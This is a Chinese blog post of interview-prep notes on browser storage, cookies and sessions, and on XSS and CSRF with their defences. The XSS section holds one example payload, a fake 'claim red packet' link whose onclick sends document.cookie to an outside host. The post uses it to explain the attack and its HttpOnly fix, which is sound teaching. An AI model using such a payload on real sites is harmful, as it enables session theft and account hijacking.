【面试常问】浏览器存储+Cookie

最新推荐文章于 2024-05-26 18:59:16 发布
最新推荐文章于 2024-05-26 18:59:16 发布
阅读量466 收藏
点赞数
分类专栏: 面试常问
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pangji0417/article/details/100026329
版权

浏览器存储

一、localStorage和sessionStorage

  1. 只有key和value,字符串存储
  2. 浏览器本地存储,不和服务端通信
1. 方法和属性
  • clear()
  • length
  • key()
  • getItem()
  • setItem()
  • removeItem()
// 获取localStorage键名
for(let i = 0; i < localStorage.length; i++){
	console.log(localStorage.key(i));
}
2. 区别
  • localStorage永久生效
  • sessionStorage只在会话内有效
  • 多个标签页之间共享localStorage;而sessionStorage只在当前会话窗口内生效

二、cookie和session

1. cookie
  • 不设置过期时间,cookie会被保存在内存中,会话关闭就销毁,这种称为会话cookie
  • 如果在浏览器中设置了cookie过期时间,cookie会被保存到硬盘中。关闭会话依然存在称为持久cookie
  • cookie是服务器发给客户端的特殊信息,cookie 以文本形式保存在客户端,每次请求都会带上
cookie字段名描述
Name
Value
Domain
Path路径
Expires/Max-Age过期时间
Size大小
HttpOnly仅http
Securehttps
2. session
  • session存储在服务端
  • sessionid存储在cookie中
  • 服务端收到请求创建session对象时,首先会检查客户端请求中是否包含sessionid
  • 如果有sessionid,服务端根据该id返回对应session对象
  • 没有sessionid,服务端会创建新的session对象
3. 区别
  • session能够支持任何类型的对象
  • cookie保存数据不能超过4kb,session没有大小限制
  • session安全性大于cookie

三、安全

XSS和CSRF

1. XSS
  • 方式
<a href="#" οnclick=`window.location=http://abc.com?cookie=${document.cookie}`>领取红包</a>
  • 解决办法

cookie设置httpOnly,JavaScript将不能操作cookie

2. CSRF

  • 第一方cookie first party cookie:cookie的域和页面的域一致

  • 第三方cookie third party cookie:cookie的域和页面域不同

  • 挂羊头卖狗肉,不得到cookie,只利用验证信息伪装请求,从而改写删服务器数据

  • 解决办法

  1. 验证码
  2. Referer Check
  3. 随机token,攻击者不能伪造的信息
等时钟成长
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浏览器存储cookie
Finit的成长空间
05-12 1145
1.起源 服务端需要知道访问者的登录状态用来区分不同用户,但HTTP是无状态协议,没法保存访问者登录状态。 为啥当初HTTP不设计成有状态的协议?因为没考虑到呗,虽然是设计者大神,但难免有局限性。 2.生成方式 服务端可以通过set-cookie形式返回,并由客户端存储,通过某种编程语言即可实现,比如Java。这样用户登录后,再次发送HTTP请求时,就可以将cookie放在HTTP请求中发...
浏览器存储Cookie
qq_46222031的博客
11-16 480
Web Storage 包括sessionstorage ,local storage 。在浏览器本地存储,一般能存储5MB大小 local Storage 关闭浏览器仍然保存 session Storage 关闭后被删除 相关api 设置:XXXStorage.setItem("Key", "Value") key,value都是字符串 读取:XXXStorage.getItem("Key") 删除:XXXStorage.removeItem("Key") 清空:XX...
Cookie和Session使用说明
最新发布
weixin_74379023的博客
05-26 797
会话技术产生的原因Cookie与Session区别:存储位置:Cookie 是将数据存储在客户端,Session 将数据存储在服务端安全性:Cookie不安全,Session安全数据大小:Cookie最大3KB,Session无大小限制存储时间:Cookie可以通过setMaxAge()长期存储,Session默认30分钟服务器性能:Cookie不占服务器资源,Session占用服务器资源Cookie是用来保证用户在未登录情况下的身份识别Session是用来保存用户登录后的数据。
浏览器本地存储cookie, localStorage 和 sessionStorage)
CSPsy的博客
02-27 1561
浏览器本地存储浏览器的本地存储中,有三种常见的方式:cookie, localStroage 和 sessionStorage 什么是 cookie cookie 全称 HTTP Cookie(也叫 Web Cookie浏览器 Cookiecookie 的属性,创建,操作方法,设置有效期限,cookie的有效期限查询 localStorage和sessionStorge 的区别 localSorage的操作方法,
浏览器存储
代码搬运工
08-01 324
Cookie、session、localStorage、sessionStorage 1、三者的异同 特性 Cookie localStorage sessionStorage 数据的生命期 一般由服务器生成,可设置失效时间。如果在浏览器端生成Cookie,默认是关闭浏览器后失效 除非被清除,否则永久保存 仅在当前会话下有效,关闭页面或浏览器后被...
浏览器存储cookie、localStorage、sessionStorage)记录
Sue's blog
04-27 281
三者的区别 作用 大小 是否会发送给浏览器 值的类型 存储时间 cookie 1. 存储用户信息,获取数据需要与服务器建立连接。2.可存储的数据有限,且依赖于服务器,无需请求服务器的数据尽量不要存放在cookie中,以免影响页面性能 4096字节+(每条4k) 附加在请求头中发送 “menu=[{%22path%22:%22/home%22%2C%22…}]; (此处有空格) t...
Cookie浏览器
02-24
Cookie是Web服务器在用户浏览器存储的一小段数据,用于识别用户身份、保持登录状态、个性化设置等。在了解Cookie浏览器之前,我们先来详细探讨一下Cookie及其相关概念。 1. **Cookie的定义与工作原理** - Cookie...
jQuery访问浏览器本地存储cookie、localStorage和sessionStorage的基本用法
10-19
在Web开发中,数据存储是不可或缺的一部分,jQuery提供了一些便捷的方法来访问和操作浏览器的本地存储,包括cookie、localStorage和sessionStorage。这三个机制都用于在客户端存储数据,但它们各有特点和适用场景。 ...
SpringBoot+vue 在后端给浏览器设置cookie
01-03
前端的vue项目在这里我使用的是axios插件发请求...//向后端发送一个请求,用于获取cookie this.axios.get(/setCookies) .then(res =>{ console.log(res) }) .catch(err =>{ console.log(err); }) 后端SpringBoo
CSS+JS+Cookie实现关闭广告后刷新浏览器不显示,关闭重启浏览器显示
02-04
Cookie是服务器发送到用户浏览器存储在本地的一小段数据,可以用来跟踪用户的状态。在此问题中,我们需要设置一个Cookie来记录用户已关闭广告的事实。 当用户点击关闭广告按钮时,JavaScript不仅隐藏广告,还会...
浏览器存储(cookie、localStorage、sessionStorage)
weixin_45696837的博客
03-04 1946
浏览器存储(cookie、localStorage、sessionStorage)
【Java 进阶篇】Java会话技术之Cookie的存活时间
繁依Fanyi的博客
11-04 3506
Cookie的存活时间是指在用户的浏览器存储Cookie的有效期。一旦超过了这个有效期,Cookie将自动被浏览器删除。Cookie的存活时间可以通过设置Cookie的Max-Age或Expires属性来控制。Max-Age属性:指定Cookie的存活时间,以秒为单位。例如,表示Cookie将在创建后的3600秒(1小时)后过期。Expires属性:指定Cookie的过期日期和时间。时间格式通常为GMT格式的日期字符串。例如,表示Cookie将在指定的日期和时间过期。
浏览器cookie
weixin_64194158的博客
08-02 836
cookie详解
js存取cookie以及设置cookie储存时间
weixin_45791806的博客
05-07 2779
// 设置cookie expires储存时间按秒计算 function setUserCookie(name, value, expires) { var date = new Date(); date.setTime(date.getTime() + (expires * 1000)); document.cookie = name + "="+ escape (value) + ";expires=" + date.toGMTString();
浏览器中的三种存储Cookie,Session,LocalStorage
qq_41708308的博客
05-08 2066
开发工具与关键技术:工具:MyEclipse 10 技术:Java 作者:范子超  撰写时间:2019-05-06 Cookie   Cookie储存在客户端,由用户自己销毁   Cookie:客户端信息存放对象,可以把用户的信息保存在用户的本地,不必总是访问服务器   Cookie用于保存客户浏览器请求服务器页面的请求信息,也可以用它保存非敏感性的内容。保存时间可以根据需要设置。如果没有设置C...
设置cookie存活时间_Cookie
weixin_30280267的博客
12-31 1367
HTTP 协议是没有记忆功能的,一次请求结束后,相关数据会被销毁。Cookie 技术其实是浏览器端的数据存储技术,解决了不同请求需要使用相同的请求数据的问题。我们把请求需要共享的请求数据,存储浏览器端,避免用户进行重复的书写请求数据。但是哪些数据需要使用Cookie 技术存储起来是一个主观问题,需要在后台进行响应的时候来告诉浏览器,有些数据其他请求还会使用,需要存储起来。下次请求时,浏览器会将 ...
浏览器本地存储数据cookies、sessionStorage和localStorage
qq_46030883的博客
10-29 1601
cookies、sessionStorage和localStorage解释及区别 在浏览器查看 HTML4的本地存储 cookie 浏览器的缓存机制提供了可以将用户数据存储在客户端上的方式,可以利用cookie,session等跟服务端进行数据交互。 一、cookie和session cookie和session都是用来跟踪浏览器用户身份的会话方式。 区别: 1、保持状态:cookie保存在浏览器端,session保存在服务器端 2、使用方式: (1)cookie机制:如果不在浏览器中设置过期时间,cook
前端面试题 -----浏览器本地存储Cookie的利弊
奋斗在路上
08-16 2145
前端面试题----关于浏览器本地存储cookie的利弊
前端面试(一)本地浏览器存储
keywords
06-04 1195
2018-06-04,前端面试(天猫)问题一:说说浏览器本地存储、各自的区别和使用注意点
前端面试Cookie的优缺点与浏览器本地存储解析
前端面试中,Cookie是常见的讨论话题,因为它在客户端数据存储中扮演着重要角色。Cookie的主要弊端包括: 1. 数量限制:每个特定域名下的Cookie数量有限制,如IE6及以下版本最多20个,而IE7及以上版本可以达到50个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值